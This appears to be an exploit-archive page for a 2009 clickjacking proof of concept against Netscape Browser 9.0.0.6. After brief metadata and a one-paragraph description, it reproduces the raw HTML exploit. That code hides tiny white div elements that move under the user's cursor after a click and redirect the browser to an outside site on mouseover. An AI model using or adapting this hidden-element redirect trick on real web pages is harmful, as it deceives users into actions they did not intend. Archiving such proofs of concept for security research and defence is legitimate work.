header-logo
Suggest Exploit
vendor:
Browser
by:
Pouya Daneshmand
7,5
CVSS
HIGH
Clickjacking
N/A
CWE
Product Name: Browser
Affected Version From: Netscape Browser V9.0.0.6
Affected Version To: Netscape Browser V9.0.0.6
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Netscape Browser (V9.0.0.6) Clickjacking

Netscape Browser (V9.0.0.6) is vulnerable to clickjacking. An attacker can use this vulnerability to trick users into clicking on malicious links or buttons. This vulnerability can be exploited by an attacker to perform malicious actions on behalf of the user.

Mitigation:

N/A
Source

Exploit-DB raw data:

     <html>
<style type="text/css">
</style>
<body>
<p align="center"><code><font face="Calibri" size="6">Netscape</font></code><code class="xml plain"><font face="Calibri" size="6" color="#FF0000">
</font><font face="Calibri" size="6"> Browser</font><font face="Calibri" size="6" color="#FF0000"> </font></code>
<font face="Arial" size="2"><code class="xml plain">
(V9.0.0.6)</code></font><font face="Calibri" size="6" color="#FF0000"><code class="xml plain">
<b>Clickjacking</b></code></font></p>
<p align="center"> </p>
<div class="style1" id="open"
style="position:absolute; width:2px; height:2px; background:#FFFFFF; border:1px; left: 2px; top: 2px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"><strong>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.google.com" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">Go to the google.com</font></a></p>
<p><br>
</p>
<div class="style1" id="open0"
style="position:absolute; width:2px; height:13px; background:#FFFFFF; border:1px none; left: 354px; top: 146px;"
onmouseover="document.location='http://www.Securitylab.ir/ClickJacking';">
<p align="center">
<font size="1" color="#FFFFFF">ClickJacking</font></div>
<p align="center"> </p>
<p align="center"> </p>
<p align="center">Discovered by: Pouya Daneshmand (whh_iran[at]yahoo[dot]com)</p>
<p align="center">http://Securitylab.ir/Advisory</p>
</html>

Navigation

Suggest Exploit

Services By CQR